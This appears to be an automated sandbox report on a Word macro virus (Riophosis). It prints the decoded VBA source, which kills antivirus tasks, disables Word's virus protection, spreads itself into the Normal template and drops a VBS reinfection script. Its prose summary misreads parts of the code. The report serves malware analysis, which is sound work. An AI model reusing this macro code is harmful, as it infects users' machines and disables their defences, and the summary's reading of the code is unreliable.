Verdict: MALICIOUS
Risk Score: 188
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros that execute upon document closure. The script attempts to establish persistence by writing an empty string to the registry key 'Hkey_LoCAL_MACHInE\SoFTwAre\MICROSOfT\windowS\currENtVerSiOn\rUN\nAv Agent', effectively removing a previously configured entry. It also references a file path 'C:\Windows\RioPhoSIS.sYS', suggesting a potential download or execution of a second-stage payload. The ClamAV detection 'Doc.Trojan.Riophosis-1' further supports its malicious nature.
Heuristics (6)
- ClamAV: Doc.Trojan.Riophosis-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Riophosis-1
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6398 bytes | 924eefaf69ec5f07a34e82bdbdd922a95ef6781def7db610a09d736731ae06df |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ThisDocument1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub dOCUmENt_CLoSE()
For Each PRog In Tasks
If InStr(1, UCase(PRog.Name), Chr(78) & Chr(65) & Chr(86)) Then PRog.Close
If InStr(1, UCase(PRog.Name), Chr(65) & Chr(78) & Chr(84) & Chr(73) & Chr(86) & Chr(73) & Chr(82) & Chr(85) & Chr(83)) Then PRog.Close
Next
System.PrivateProfileString("", "Hkey_LoCAL_MACHInE\SoFTwAre\MICROSOfT\windowS\currENtVerSiOn\rUN\", "nAv Agent") = ""
BThHTrRGcfG = 122174.617662907 Or 684237.451576531 '
With Application
Nohkjo = 712368.431593716 And 76435.6087220907 '
.DisplayAlerts = wdAlertsNone
onnchbl = 586217.413240314 + 739983.593530834 '
.EnableCancelKey = wdCancelDisabled
With .Options
prdcfhont = naqrpbedd Eqv jhhtejqrf '
.VirusProtection = 0
qkqjc = qnkkj Xor mhajq '
.ConfirmConversions = 0
bfmhcipmiho = ifgbkceksca And isdarfbtkii '
jebnnsl = soiphpj Eqv rrqfhdr '
.SaveNormalPrompt = 0
End With
jooibrjff = 834244.311075747 Eqv 531363.790344357 '
End With
If ThisDocument = ActiveDocument Then Set Target = NormalTemplate
jidbj = 894053.339973629 Xor 563240.203284502 '
If ThisDocument = NormalTemplate Then Set Target = ActiveDocument
SouRCefile = Environ$("wInDIR") & "\RioPhoSIS.sYS"
hhisihddrsoqqa = jqalsipposdlqc + teftpdoekdsgdq '
VBSBackup = Environ$("wINdIR") & "\RiOpHoSiS.vBs"
cjcflschfea = 573881.886711717 Or 305555.097677171 '
With ThisDocument.VBProject.VbCOmPOnEnTs(1).coDEmodULE
vCOde = UCase(.lines(1, .cOUNTOfLinES))
ofsijmkcfr = simapslfmh Or seploqjnho '
poLy
jerqtcpd = egakqgod + lgapdshn '
btgfbdkkthlas = 7975.92796003819 Or 452493.274713457 '
For couNter = 1 To Len(vCOde)
tbhrrihnjrkfgm = 164667.97812742 And 738947.1293993 '
aieokojmqqks = 990259.014737248 Xor 200465.538307607 '
T = Mid(vCOde, couNter, 1)
cngifhsttntm = 226566.505363047 Or 326078.92330277 '
onlkkhtsni = 238983.749777913 Or 116403.046076238 '
If Asc(T) < 90 And Asc(T) > 65 Then T = Chr(Asc(T) + Int(Rnd * 2) * 32)
nndemtmnfai = ogpjoiggmph Eqv spedatqflge '
NewVCoDe = NewVCoDe & T
Next
lnttribtdcte = 104719.176477313 And 754792.233507335 '
fegdn = gfrod + fsgkl '
Open SouRCefile For Output As #1
Print #1, NewVCoDe
paqmpgjblfqbs = 729437.277439892 And 284994.436417937 '
Close #1
otjqmctjf = gmsnkcttf And pnrkedfsl '
Open VBSBackup For Output As #1
Print #1, "on erROr resuME neXt"
llhfcm = dmgedh Or qkomje '
Print #1, "sEt fsO = creATEoBJeCt(""word.AppLiCATION"")"
Print #1, "WitH fSO.OPtIoNS"
eogcqpetsao = 256962.400012136 + 285123.122717321 '
Print #1, ".VIRUsProteCtiON = 0"
Print #1, ".confIRmcoNveRsIons = 0"
ckhcokla = 889230.673382878 + 800425.265495718 '
Print #1, ".SAVENoRmALPRompt = 0"
Print #1, ".APPLicATion.DiSPlAYAlertS = WdALERtSnonE"
nqooalblt = 672370.715110302 And 794389.585992157 '
Print #1, "EnD WIth"
irjnheodbcis = jpjrbhamcaqd Xor itsbpdoltaql '
Print #1, "wITh FSO.NormAltempLATE.VbPrOJECT.vBcOMPOnenTs(1)"
Print #1, ".CODEMOdulE.delETElINes 1, .cODEMOdULE.CoUntOflinES"
brpteakmgssshh = fqeedohtpfrcjg Xor ffheojcopggqpo '
Print #1, ".cOdemODULe.ADDFRomfILe """ & SouRCefile & """"
leihlkbhgs = pdffctlges Eqv enkdpqdiab '
Print #1, "eND wiTh"
nhpbilpaie = 519876.43706274 And 253826.543181717 '
Print #1, "FsO.nORMAlTeMPlATE.sAve"
eentipgcmd = pasjcrbfjc - bekjroicqk '
Print #1, "fsO.QUit"
qjamoh = relefg - hltthm '
Close #1
geqpeisebabt = 194717.331718326 - 799250.578331172 '
patblqtr = jtjkmqat + cioknceo '
cgeng = lepio Or orerm '
sjniidnddmp = segahmijlqj Xor nerkjhqjsbi '
System.PrivateProfileString("",
... (truncated)